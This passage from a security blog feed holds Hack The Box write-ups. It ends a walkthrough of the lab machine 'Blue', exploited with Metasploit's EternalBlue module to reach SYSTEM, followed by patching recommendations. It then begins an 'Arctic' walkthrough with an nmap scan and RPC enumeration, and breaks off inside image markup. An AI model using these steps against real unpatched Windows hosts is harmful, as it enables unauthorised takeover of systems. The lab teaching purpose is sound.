srcset="https://substackcdn.com/image/fetch/$s_!gbhf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 424w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 848w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 1272w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gbhf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gbhf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 424w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 848w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 1272w, https://substackcdn.com/image/fetch/$s_!gbhf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>We know it&#8217;s a Windows 7 host, so let&#8217;s use <em>exploit/windows/smb/ms17_10_eternalblue.</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hFJn!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hFJn!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 424w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 848w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 1272w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hFJn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hFJn!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 424w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 848w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 1272w, https://substackcdn.com/image/fetch/$s_!hFJn!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9fc925df-63b1-42b6-b24d-58b4aaf021f5_800x446.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Set the RHOST, Payload, LHOST, and LPORT and hit run.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XWUo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XWUo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 424w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 848w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 1272w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XWUo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!XWUo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 424w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 848w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 1272w, https://substackcdn.com/image/fetch/$s_!XWUo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2f9354a1-450c-4eef-abe7-ff9b08442d51_800x437.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>BOOM! No need to further enumerate in this context, we are <br><em><strong>nt authority\SYSTEM. </strong></em>Get the user flag.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FGcE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FGcE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 424w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 848w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 1272w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FGcE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/bbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FGcE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 424w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 848w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 1272w, https://substackcdn.com/image/fetch/$s_!FGcE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbc37f6f-4b68-45b4-8421-27860e5cf387_800x631.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Change directories and get the root flag. Done!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QX7L!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QX7L!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 424w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 848w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 1272w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QX7L!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!QX7L!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 424w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 848w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 1272w, https://substackcdn.com/image/fetch/$s_!QX7L!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9335adab-88cd-44a7-8b01-10dced7b6ab2_783x149.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h3>Findings, Sample Code, and Flags</h3><p>Finding 1: Microsoft Server Message Block 1.0 (SMBv1) is vulnerable to exploitation and has not been patched. This allows a malicious adversary the ability to log in with elevated privileges remotely.</p><h3>Additional Actions</h3><p>None.</p><h3>High-Level Summary and Recommendations</h3><p>C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Blue (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using unpatched software, the adversary was able to use a public exploit (ETERNAL BLUE) to gain administrative access.</p><p>From here, the adversary was logged in as nt authority/SYSTEM (Administrative permissions) and could have effectively taken the system completely over or used it to pivot to other hosts.</p><p>The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems.</p><p>Specific recommendations include following the guidance from Microsoft found <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010">here</a>.</p><h3>Tools Used</h3><p>nmap<br>rpcclient<br>smbclient<br>enum4linux<br>SearchSploit<br>Metasploit</p><p>Other Walktroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560">Arctic</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-lame-5cf414d1c523">Lame</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-legacy-147bbcc9ff02">Legacy</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-mirai-83b22174f03b">Mirai</a></p>]]></content:encoded></item><item><title><![CDATA[HTB Retired Box Write-up: Arctic]]></title><description><![CDATA[Artic is a retired Windows machine that is rated as Easy-ish on Hack the Box.]]></description><link>https://tidbit.theosintion.com/p/htb-retired-box-write-up-arctic-50eccccc560</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/htb-retired-box-write-up-arctic-50eccccc560</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Wed, 28 Aug 2019 02:23:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!88An!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Artic is a retired Windows machine that is rated as Easy-ish on Hack the Box.</p><blockquote><p>Hostname: Arctic<br>IP: 10.10.10.11<br>Operating System: Windows</p></blockquote><h3>Port Scan Results*</h3><p>A simple nmap port scan <em>nmap -vvvvv 10.10.10.11 yields the following ports:</em></p><blockquote><p>135/tcp: msrpc<br>8500/tcp: fmtp*<br>43154/tcp: unknown.</p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!88An!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!88An!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 424w, https://substackcdn.com/image/fetch/$s_!88An!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 848w, https://substackcdn.com/image/fetch/$s_!88An!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 1272w, https://substackcdn.com/image/fetch/$s_!88An!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!88An!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!88An!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 424w, https://substackcdn.com/image/fetch/$s_!88An!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 848w, https://substackcdn.com/image/fetch/$s_!88An!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 1272w, https://substackcdn.com/image/fetch/$s_!88An!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2688ec42-a03f-4cf0-a367-c08689b8182b_800x480.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a><figcaption class="image-caption">nmap -vvvvv 10.10.10.11</figcaption></figure></div><h3>Further Enumeration*</h3><p>I like to start Microsoft based systems enumerations with RPC and SMB. Seeing as this system only has RPC, let&#8217;s try that first. (Note: Joff Thyer over at Black Hills Infosec has a <strong>GREAT</strong> <a href="https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/">blog about password spraying using RPC</a>.)</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NyqZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NyqZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 424w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 848w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 1272w, https://substackcdn.com/image/fetch/$s_!NyqZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NyqZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4057110-f9c6-4fba-a71a-be98263f83f1_687x55.png" 